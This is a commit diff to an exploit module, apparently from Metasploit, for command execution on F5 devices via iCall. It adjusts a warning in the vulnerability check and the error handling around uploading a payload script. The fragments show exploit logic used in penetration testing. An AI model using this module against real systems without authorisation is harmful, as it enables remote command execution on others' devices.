Better handling of invulnerable case; fix 401 case

jhart-r7 · jhart-r7 · commit bcdf2ce1e30e · 2015-11-18T15:24:41.000-08:00
diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -208,7 +208,7 @@ def check
     if res && res.code == 500 && res.body =~ /path is empty/
       return Exploit::CheckCode::Appears
     elsif res && res.code == 401
-      print_warning("HTTP/#{res.proto} #{res.status} #{res.message} -- incorrect USERNAME or PASSWORD?")
+      print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
       return Exploit::CheckCode::Unknown
     else
       return Exploit::CheckCode::Safe
@@ -229,9 +229,13 @@ def exploit
 
     script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
     print_status("Uploading payload script #{script_name}")
-    create_script_res = create_script(script_name, cmd)
-    unless create_script_res && create_script_res.code == 200
-      print_error("Upload payload script failed")
+    unless create_script_res = create_script(script_name, cmd)
+      print_error("No response when uploading payload script")
+      return false
+    end
+    unless create_script_res.code == 200
+      print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
+                  "#{create_script_res.code} #{create_script_res.message}")
       return false
     end
     unless script_exists?(script_name)
